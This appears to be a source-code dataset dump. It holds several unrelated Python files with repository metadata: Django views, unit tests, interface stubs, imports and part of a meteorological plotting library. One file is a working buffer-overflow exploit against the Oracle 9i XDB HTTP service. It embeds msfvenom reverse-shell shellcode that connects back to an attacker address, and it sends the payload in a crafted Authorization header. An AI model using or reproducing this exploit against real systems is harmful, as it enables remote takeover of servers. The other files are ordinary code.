6e49ee8b2ffb6d19dcfd9cbe8b3397416c9b5ded
|
[
"BSD-3-Clause"
] | 2
|
2022-03-01T00:38:09.000Z
|
2022-03-21T09:38:49.000Z
|
def setup_handlers(web_app):
pass
| 12.666667
| 28
| 0.736842
| 6
| 38
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184211
| 38
| 2
| 29
| 19
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
321697c6f2f28cd4f7723eac460ab47d6a5d0e33
| 287
|
py
|
Python
|
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
def index(request):
return render(request, 'channel/index.html')
def room(request, room_name):
return render(request, 'channel/room.html', {
'room_name': room_name
})
| 23.916667
| 49
| 0.71777
| 38
| 287
| 5.342105
| 0.447368
| 0.118227
| 0.187192
| 0.246305
| 0.305419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174216
| 287
| 12
| 50
| 23.916667
| 0.85654
| 0.080139
| 0
| 0.25
| 0
| 0
| 0.1673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
5c54417937c7899fd8c6983a5daae59d1bdff333
| 636
|
py
|
Python
|
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
import unittest
from katas.kyu_7.a_rule_of_divisibility_by_13 import thirt
class ThirtTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(thirt(1234567), 87)
def test_equals_2(self):
self.assertEqual(thirt(321), 48)
def test_equals_3(self):
self.assertEqual(thirt(8529), 79)
def test_equals_4(self):
self.assertEqual(thirt(85299258), 31)
def test_equals_5(self):
self.assertEqual(thirt(5634), 57)
def test_equals_6(self):
self.assertEqual(thirt(1111111111), 71)
def test_equals_7(self):
self.assertEqual(thirt(987654321), 30)
| 23.555556
| 58
| 0.688679
| 87
| 636
| 4.816092
| 0.45977
| 0.116945
| 0.217184
| 0.400955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134122
| 0.20283
| 636
| 26
| 59
| 24.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.411765
| false
| 0
| 0.117647
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
5c6c062454eb5aef00acec053742e41f9cdc9ea2
| 31
|
py
|
Python
|
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | null | null | null |
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | null | null | null |
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | 1
|
2019-04-04T00:05:35.000Z
|
2019-04-04T00:05:35.000Z
|
import _gto
from _gto import *
| 10.333333
| 18
| 0.774194
| 5
| 31
| 4.4
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 31
| 2
| 19
| 15.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5c6db08932438f83de80e9f0c5bb4103c494815e
| 535
|
py
|
Python
|
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | 1
|
2019-09-08T04:17:16.000Z
|
2019-09-08T04:17:16.000Z
|
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | null | null | null |
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | null | null | null |
class Dispatcher:
def can_dispatch(self, request):
raise NotImplementedError()
def dispatch(self, request):
raise NotImplementedError()
class Transport:
def can_transport(self, request):
pass
def send_request(self, context, data):
raise NotImplementedError()
def send_event(self, context, data):
raise NotImplementedError()
class Protocol:
def encode(self, obj):
raise NotImplementedError()
def decode(self, data):
raise NotImplementedError()
| 20.576923
| 42
| 0.665421
| 53
| 535
| 6.641509
| 0.358491
| 0.409091
| 0.230114
| 0.136364
| 0.465909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.250467
| 535
| 25
| 43
| 21.4
| 0.877805
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.411765
| false
| 0.058824
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
5cd2541c505933bd016379e8eb3e8622c2aa157b
| 2,677
|
py
|
Python
|
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | 41
|
2018-05-21T02:56:01.000Z
|
2022-03-22T03:57:33.000Z
|
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | null | null | null |
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | 22
|
2019-01-29T18:42:03.000Z
|
2021-11-02T21:11:13.000Z
|
# Exploit for Oracle 9i XDB HTTP PASS Overflow (win32)
# Based on https://www.exploit-db.com/exploits/16809/
# By TIMLAB timip.net
# Use in the form "python oracle9i_xdb_http_pass.py <Target IP Address> <Target Port No.>"
# Target Port No. = 8080
import sys, socket, base64
# Please replace it with your shellcode!!!!!!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.134 LPORT=4445 -b '\x00' -f python
buf = ""
buf += "\xd9\xc4\xbb\x69\x6e\xb8\x34\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x34\x7d\x5a"
buf += "\xc1\x3a\x69\x18\x2a\xc2\x6a\x7d\xa2\x27\x5b\xbd\xd0"
buf += "\x2c\xcc\x0d\x92\x60\xe1\xe6\xf6\x90\x72\x8a\xde\x97"
buf += "\x33\x21\x39\x96\xc4\x1a\x79\xb9\x46\x61\xae\x19\x76"
buf += "\xaa\xa3\x58\xbf\xd7\x4e\x08\x68\x93\xfd\xbc\x1d\xe9"
buf += "\x3d\x37\x6d\xff\x45\xa4\x26\xfe\x64\x7b\x3c\x59\xa7"
buf += "\x7a\x91\xd1\xee\x64\xf6\xdc\xb9\x1f\xcc\xab\x3b\xc9"
buf += "\x1c\x53\x97\x34\x91\xa6\xe9\x71\x16\x59\x9c\x8b\x64"
buf += "\xe4\xa7\x48\x16\x32\x2d\x4a\xb0\xb1\x95\xb6\x40\x15"
buf += "\x43\x3d\x4e\xd2\x07\x19\x53\xe5\xc4\x12\x6f\x6e\xeb"
buf += "\xf4\xf9\x34\xc8\xd0\xa2\xef\x71\x41\x0f\x41\x8d\x91"
buf += "\xf0\x3e\x2b\xda\x1d\x2a\x46\x81\x49\x9f\x6b\x39\x8a"
buf += "\xb7\xfc\x4a\xb8\x18\x57\xc4\xf0\xd1\x71\x13\xf6\xcb"
buf += "\xc6\x8b\x09\xf4\x36\x82\xcd\xa0\x66\xbc\xe4\xc8\xec"
buf += "\x3c\x08\x1d\xa2\x6c\xa6\xce\x03\xdc\x06\xbf\xeb\x36"
buf += "\x89\xe0\x0c\x39\x43\x89\xa7\xc0\x04\xbc\x3c\xca\x52"
buf += "\xa8\x40\xca\x4b\x74\xcc\x2c\x01\x96\x98\xe7\xbe\x0f"
buf += "\x81\x73\x5e\xcf\x1f\xfe\x60\x5b\xac\xff\x2f\xac\xd9"
buf += "\x13\xc7\x5c\x94\x49\x4e\x62\x02\xe5\x0c\xf1\xc9\xf5"
buf += "\x5b\xea\x45\xa2\x0c\xdc\x9f\x26\xa1\x47\x36\x54\x38"
buf += "\x11\x71\xdc\xe7\xe2\x7c\xdd\x6a\x5e\x5b\xcd\xb2\x5f"
buf += "\xe7\xb9\x6a\x36\xb1\x17\xcd\xe0\x73\xc1\x87\x5f\xda"
buf += "\x85\x5e\xac\xdd\xd3\x5e\xf9\xab\x3b\xee\x54\xea\x44"
buf += "\xdf\x30\xfa\x3d\x3d\xa1\x05\x94\x85\xd1\x4f\xb4\xac"
buf += "\x79\x16\x2d\xed\xe7\xa9\x98\x32\x1e\x2a\x28\xcb\xe5"
buf += "\x32\x59\xce\xa2\xf4\xb2\xa2\xbb\x90\xb4\x11\xbb\xb0"
host = sys.argv[1]
port = sys.argv[2]
ret = "\x46\x6d\x61\x60"
prependEncoder = "\x81\xc4\xff\xef\xff\xff\x44"
prep = "\x41" * 4 + ":" + "\x41" * 442
prep += "\xeb\x64" + "\x90" * 2 + ret
prep += "\x90" * 266 + "\xeb\x10" + "\x90" * 109 + prependEncoder + buf
prep = base64.b64encode(prep)
exploit = "GET / HTTP/1.1\x0d\x0a" + "Host: " + host + ":" + port + "\x0d\x0aAuthorization: Basic " + prep + "\x0d\x0a\x0d\x0a"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, int(port)))
client.sendall(exploit)
client.close()
print 'Done! Try harder!'
| 46.155172
| 127
| 0.672768
| 534
| 2,677
| 3.359551
| 0.531835
| 0.010033
| 0.012263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204341
| 0.087785
| 2,677
| 57
| 128
| 46.964912
| 0.530303
| 0.137094
| 0
| 0
| 0
| 0.627907
| 0.684622
| 0.631625
| 0.093023
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.023256
| null | null | 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7a710b950ddeeebd97825f0812b4bab3c0de0ad0
| 73
|
py
|
Python
|
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
from PygameFloatObjects.objects import FloatRect, FloatCircle, FloatFont
| 36.5
| 72
| 0.876712
| 7
| 73
| 9.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 73
| 1
| 73
| 73
| 0.955224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7a919abb635d3c7301e3044651ab38c78339674e
| 55
|
py
|
Python
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 4,716
|
2016-06-07T05:48:42.000Z
|
2022-03-31T22:30:15.000Z
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 3,644
|
2016-06-07T05:55:42.000Z
|
2022-03-31T13:25:57.000Z
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 576
|
2016-06-07T06:28:32.000Z
|
2022-03-31T02:46:15.000Z
|
from xonsh.ptk_shell.shell import * # noqa: F403 F401
| 27.5
| 54
| 0.745455
| 9
| 55
| 4.444444
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 0.163636
| 55
| 1
| 55
| 55
| 0.73913
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7a933aba157e656a7ee1ee0874eb4ff73d1e70ec
| 87
|
py
|
Python
|
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | 2
|
2019-08-14T19:11:40.000Z
|
2021-04-15T09:57:35.000Z
|
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | null | null | null |
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | null | null | null |
from .parser import parse
from .compiler import compile_drgn
from .scanner import scan
| 21.75
| 34
| 0.827586
| 13
| 87
| 5.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 87
| 3
| 35
| 29
| 0.946667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f9489601bb7707826675e276fbf1cdfccc5a057
| 40,692
|
py
|
Python
|
plotly/vis.py
|
NREL/MetMastVis
|
0c3dd87540471c061eb491c871fdb32e6dabd31b
|
[
"Apache-2.0"
] | 1
|
2018-05-25T20:03:48.000Z
|
2018-05-25T20:03:48.000Z
|
plotly/vis.py
|
nhamilto/MetMast
|
38475682adb21081c86c58e9008a278971306c23
|
[
"Apache-2.0"
] | null | null | null |
plotly/vis.py
|
nhamilto/MetMast
|
38475682adb21081c86c58e9008a278971306c23
|
[
"Apache-2.0"
] | 2
|
2018-06-07T20:00:03.000Z
|
2020-11-26T21:52:04.000Z
|
"""
:module: vis
:platform: Unix, Windows
:synopsis: This code is used as a visualization library for the Met Mast data so it is specifically designed to handle MetDat object from the "met_funcs.py" library.
:moduleauthor: Nicholas Hamilton <Nicholas.Hamilton@nrel.gov> Rafael Mudafort <Rafael.Mudafort@nrel.gov> Lucas McCullum <Lucas.McCullum@nrel.gov>
"""
###########################################
# Visualization
###########################################
import utils
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import numpy as np
from colour import Color
from windrose import WindroseAxes
import pandas as pd
plt.rc('font', family='serif')
plt.rc('font', size=12)
plt.rc('facecolor')
def cumulative_profile(metdat, catinfo, category=None):
"""**Get Variable Profile**.
Plot the vertical profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
# extract vertical locations of data from variable names
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
plotdat = metdat[colnames].mean()
fig, ax = plt.subplots(figsize=(3.5,5))
ax.plot(plotdat, vertlocs)
ax.set_ylabel('Probe Height [m]')
ax.set_xlabel(catinfo['labels'][category])
fig.tight_layout()
return fig, ax
def monthly_profile(metdat, catinfo, category=None, basecolor='cycle'):
"""**Get Monthly Profile**.
Plot the monthly profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. basecolor (string) [default: 'cycle']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
months = utils.monthnames()
colors = utils.get_colors(len(months), basecolor=basecolor)
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
plotdat = metdat[colnames].groupby(metdat.index.month).mean()
fig, ax = plt.subplots(figsize=(3.5,5), sharex=True, sharey=True)
for iax in range(len(months)):
ax.plot(plotdat.xs(iax+1), vertlocs, color=colors[iax])
leg = ax.legend(months, loc=7, bbox_to_anchor=(1.75, 0.5), edgecolor='w')
ax.set_ylabel('Probe Height [m]')
ax.set_xlabel(catinfo['labels'][category])
fig.tight_layout()
return fig, ax
def stability_profile(metdat, catinfo, category=None, vertloc=80, basecolor='cycle'):
"""**Get Stability Profile**.
Plot the stability profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'cycle]: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
stab, stabloc, ind = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
colors = utils.get_colors(5,basecolor=basecolor)
stabconds = utils.get_stabconds()
plotdat = metdat.groupby(stab).mean()
pdat = plotdat[catinfo['columns'][category]].get_values()
# Extract vertical locations of data from variable names
_, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
fig, ax = plt.subplots(figsize=(3.5,5))
for ii, cond in enumerate(stabconds):
ax.plot(pdat[ii,ind], vertlocs, color=colors[ii])
ax.set_ylabel('Probe Height [m]')
ax.set_xlabel(catinfo['labels'][category])
fig.legend(stabconds, loc=6, bbox_to_anchor=(1,0.5), frameon=False)
fig.tight_layout()
return fig, ax
def monthly_stability_profiles(metdat, catinfo, category=None, vertloc=80, basecolor='span'):
"""**Get Monthly Stability Profile**.
Plot the monthly stability profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
stab, stabloc, ind = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
plotdat = metdat.groupby([metdat.index.month, stab])
colors = utils.get_colors(5,basecolor='span')
months = utils.monthnames()
stabconds = utils.get_stabconds()
# extract vertical locations of data from variable names
_, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
fig, ax = plt.subplots(4,3, figsize=(8,13), sharex=True, sharey=True)
for iax, month in enumerate(months):
for ii, cond in enumerate(stabconds):
pdat = plotdat[catinfo['columns'][category]].get_group((iax+1, cond)).mean()
ax.flatten()[iax].plot(pdat[ind], vertlocs, color=colors[ii])
ax.flatten()[iax].set_title(month)
fig.text(0,0.58, 'Probe Height [m]', ha='center', va='center', fontsize=14, rotation='vertical')
leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.12), frameon=False)
fig.tight_layout()
fig.subplots_adjust(bottom=0.175)
fig.text(0.525,0.135, catinfo['labels'][category], ha='center', va='center', fontsize=14)
return fig, ax
def hourlyplot(metdat, catinfo, category=None, basecolor='span'):
"""**Get Hourly Averaged Profile**.
Plot the hourly averaged profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
4. basecolor (string): Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
colors = utils.get_colors(len(catinfo['columns'][category]), basecolor=basecolor, reverse=True)
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category], reverse=True)
plotdat = metdat[colnames].groupby(metdat.index.hour).mean()
fig, ax = plt.subplots(figsize=(5,3.5), sharex=True, sharey=True)
for iax in range(len(colnames)):
ax.plot(plotdat[colnames[iax]], color=colors[iax])
leg = ax.legend([str(v) + ' m' for v in vertlocs], loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
ax.set_xlabel('Time [hour]')
ax.set_ylabel(catinfo['labels'][category])
fig.tight_layout()
return fig, ax
def monthlyhourlyplot(metdat, catinfo, category=None, basecolor='span'):
"""**Get Monthly Hourly Averaged Profile**.
Plot the monthly hourly averaged profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
months = utils.monthnames()
colors = utils.get_colors(len(catinfo['columns'][category]), basecolor=basecolor, reverse=True)
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category], reverse=True)
plotdat = metdat[colnames].groupby([metdat.index.month.rename('month'), metdat.index.hour.rename('hour')]).mean()
fig, ax = plt.subplots(4,3, figsize=(9,11), sharex=True, sharey=True)
for iax in range(len(months)):
for catitem in range(len(colnames)):
ax.flatten()[iax].plot(plotdat[colnames[catitem]].xs(iax+1), color=colors[catitem])
ax.flatten()[iax].set_title(months[iax], fontsize=12)
fig.text(0.5,0.2, 'Time of Day [hour]', ha='center', va='center')
leg = fig.legend([str(v) + ' m' for v in vertlocs], loc = 'upper center', bbox_to_anchor = (0,-0.825,1,1), bbox_transform = plt.gcf().transFigure, frameon=False, ncol=2)
fig.tight_layout()
fig.subplots_adjust(bottom=0.25)
fig.text(0,0.6125, catinfo['labels'][category], ha='center', va='center', rotation='vertical')
return fig, ax
def rose_fig(metdat, catinfo, category=None, vertloc=80, bins=6, nsector=36, ylim=None, noleg=False):
"""**Get Wind Rose Figure**.
Plot the wind rose of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. bins (integer, list) [default: 6]: Indicates the number of equally spaced bins to divide the variable.
6. nsector (integer) [default: 36]: Indicated the number of sector directions to divide the rose figure.
7. ylim (float) [default: None]: Provides the maximum value for the frequency of observations and is used to plot different roses with uniform limits.
8. noleg (Boolean) [default: False]: Determines whether or not there will be a legend to the figure.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
3. leg (Matplotlib Legend): The legend object for the desired input data and categories.
"""
# set up data
dircol, _, _= utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
varcol, vertloc, _= utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
winddir = metdat[dircol]
var = metdat[varcol]
# get var divisions set up
if isinstance(bins, int):
nbins = bins
else:
nbins = len(bins)
# set up plotting colors
colors = utils.get_colors(nbins-1, basecolor='span')
colors += ['#3A4246'] # add something dark to the end.
colors = tuple(colors[0:nbins])
# built figure
fig = plt.figure()
ax = WindroseAxes.from_ax(fig=fig)
ax.bar(winddir, var, normed=True, opening=0.95, edgecolor='white', bins=bins, nsector=nsector,colors=colors, linewidth=0.35)
# legend
leg=['blank']
if noleg is not True:
leg = ax.set_legend(loc=7,bbox_to_anchor=(1.55,0.5), fontsize=10, frameon=False)
# add labels to legend
leg.set_title(catinfo['labels'][category])
fig.text(0.875, 0.275, r'$z={}$ m'.format(vertloc))
# adjust plot for specified max frequency
if ylim is None:
ylim = ax.get_ylim()[-1]
# frequency axis limits and labels
ax.set_ylim(0,ylim)
ax.set_yticks(np.linspace(0,ylim,4))
ax.set_yticklabels([str(round(x,1)) for x in np.linspace(0,ylim,4)])
return fig, ax, leg
def monthly_rose_fig(metdat, catinfo, category=None, vertloc=80, bins=6, nsector=36, ylim=None, noleg=False):
"""**Get Monthly Wind Rose Figure**.
Plot the monthly wind rose of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. vertloc (integer, float) [default: 80]: Describes the desired vertical location alond the tower for analysis.
5. bins (integer, list) [default: 6]: Indicates the number of equally spaced bins to divide the variable.
6. nsector (integer) [default: 36]: Indicated the number of sector directions to divide the rose figure.
7. ylim (float) [default: None]: Provides the maximum value for the frequency of observations and is used to plot different roses with uniform limits.
8. noleg (Boolean) [default: False]: Determines whether or not there will be a legend to the figure.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
